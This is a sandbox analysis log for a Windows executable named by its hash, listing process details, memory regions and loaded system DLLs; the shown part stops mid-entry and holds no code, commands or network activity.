# Flog Txt Version 1 # Analyzer Version: 4.3.0 # Analyzer Build Date: Sep 20 2021 05:59:55 # Log Creation Date: 28.09.2021 10:14:06.349 Process: id = "1" image_name = "efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" page_root = "0x3ae89000" os_pid = "0xc80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x640" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 118 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 119 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 120 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 121 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 122 start_va = 0xa0000 end_va = 0xa3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 123 start_va = 0xb0000 end_va = 0xb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 124 start_va = 0xc0000 end_va = 0xc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 125 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 126 start_va = 0x400000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 127 start_va = 0xf20000 end_va = 0x1129fff monitored = 1 entry_point = 0xf47dcd region_type = mapped_file name = "efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe") Region: id = 128 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 129 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 130 start_va = 0xfffb0000 end_va = 0xfffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000fffb0000" filename = "" Region: id = 131 start_va = 0xfffe0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffe0000" filename = "" Region: id = 132 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 133 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 271 start_va = 0x9f0000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 272 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 273 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 274 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 275 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 276 start_va = 0x1130000 end_va = 0x16bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 277 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 278 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 279 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 280 start_va = 0xffeb0000 end_va = 0xfffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000ffeb0000" filename = "" Region: id = 281 start_va = 0xd0000 end_va = 0x18dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 282 start_va = 0x190000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 283 start_va = 0xa00000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 284 start_va = 0x75670000 end_va = 0x75675fff monitored = 0 entry_point = 0x75671460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 285 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 286 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 287 start_va = 0x800000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 288 start_va = 0x16c0000 end_va = 0x1abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 289 start_va = 0x6d280000 end_va = 0x6d2a3fff monitored = 0 entry_point = 0x6d284820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 290 start_va = 0x6dd00000 end_va = 0x6dd07fff monitored = 0 entry_point = 0x6dd017b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 291 start_va = 0x6dd10000 end_va = 0x6dd17fff monitored = 0 entry_point = 0x6dd11740 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 292 start_va = 0x6ffe0000 end_va = 0x701eefff monitored = 0 entry_point = 0x7008b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 293 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 294 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 295 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 296 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 297 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 298 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 299 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 300 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 301 start_va = 0x761f0000 end_va = 0x7624efff monitored = 0 entry_point = 0x761f4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 302 start_va = 0x6d230000 end_va = 0x6d245fff monitored = 0 entry_point = 0x6d2321d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 303 start_va = 0x6d250000 end_va = 0x6d272fff monitored = 0 entry_point = 0x6d258940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 304 start_va = 0x706b0000 end_va = 0x706c8fff monitored = 0 entry_point = 0x706b47e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 305 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 306 start_va = 0x70830000 end_va = 0x70a3cfff monitored = 0 entry_point = 0x7091acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 307 start_va = 0x72040000 end_va = 0x7206efff monitored = 0 entry_point = 0x7204bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 308 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 309 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 310 start_va = 0x757f0000 end_va = 0x757fefff monitored = 0 entry_point = 0x757f2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 311 start_va = 0x76270000 end_va = 0x76361fff monitored = 0 entry_point = 0x762a8070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 312 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 313 start_va = 0x76370000 end_va = 0x7776efff monitored = 0 entry_point = 0x7652b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 314 start_va = 0x74c60000 end_va = 0x75158fff monitored = 0 entry_point = 0x74e67610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 315 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 316 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 317 start_va = 0x77770000 end_va = 0x777b3fff monitored = 0 entry_point = 0x77777410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 318 start_va = 0x777c0000 end_va = 0x7781dfff monitored = 0 entry_point = 0x777d7470 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\SysWOW64\\FirewallAPI.dll" (normalized: "c:\\windows\\syswow64\\firewallapi.dll") Region: id = 319 start_va = 0x76010000 end_va = 0x76022fff monitored = 0 entry_point = 0x76011d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 320 start_va = 0x75160000 end_va = 0x7524afff monitored = 0 entry_point = 0x7519d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 321 start_va = 0x6ffd0000 end_va = 0x6ffdafff monitored = 0 entry_point = 0x6ffd1d20 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 322 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 323 start_va = 0x1ac0000 end_va = 0x1c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 324 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 325 start_va = 0x840000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 326 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 327 start_va = 0x1130000 end_va = 0x12b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 328 start_va = 0x12c0000 end_va = 0x16bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 329 start_va = 0x1c80000 end_va = 0x307ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c80000" filename = "" Region: id = 330 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 331 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 332 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 333 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 334 start_va = 0x3080000 end_va = 0x324ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 335 start_va = 0x724c0000 end_va = 0x724ebfff monitored = 0 entry_point = 0x724d5ee0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\SysWOW64\\fwbase.dll" (normalized: "c:\\windows\\syswow64\\fwbase.dll") Region: id = 336 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 337 start_va = 0x9d0000 end_va = 0x9d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 338 start_va = 0xe00000 end_va = 0xe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 339 start_va = 0x9d0000 end_va = 0x9d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 340 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 341 start_va = 0x9e0000 end_va = 0x9e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 342 start_va = 0x1ac0000 end_va = 0x1b7bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ac0000" filename = "" Region: id = 343 start_va = 0x1c70000 end_va = 0x1c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 344 start_va = 0x9e0000 end_va = 0x9e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 345 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 346 start_va = 0x3250000 end_va = 0x3586fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 347 start_va = 0xe80000 end_va = 0xe83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 348 start_va = 0x704d0000 end_va = 0x704e2fff monitored = 0 entry_point = 0x704d9950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 349 start_va = 0x704a0000 end_va = 0x704cefff monitored = 0 entry_point = 0x704b95e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 350 start_va = 0x742c0000 end_va = 0x742dafff monitored = 0 entry_point = 0x742c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 351 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 352 start_va = 0x3080000 end_va = 0x317ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 353 start_va = 0x3240000 end_va = 0x324ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003240000" filename = "" Region: id = 354 start_va = 0xe90000 end_va = 0xeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 355 start_va = 0xeb0000 end_va = 0xebffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000eb0000" filename = "" Region: id = 356 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 357 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 358 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 359 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 360 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 361 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 362 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 363 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 364 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 365 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 366 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 367 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 368 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 369 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 370 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 371 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 372 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 373 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 374 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 375 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 376 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 377 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 378 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 379 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 380 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 381 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 382 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 383 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 384 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 385 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 386 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 387 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 388 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 389 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 390 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 391 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 392 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 393 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 394 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 395 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 396 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 397 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 398 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 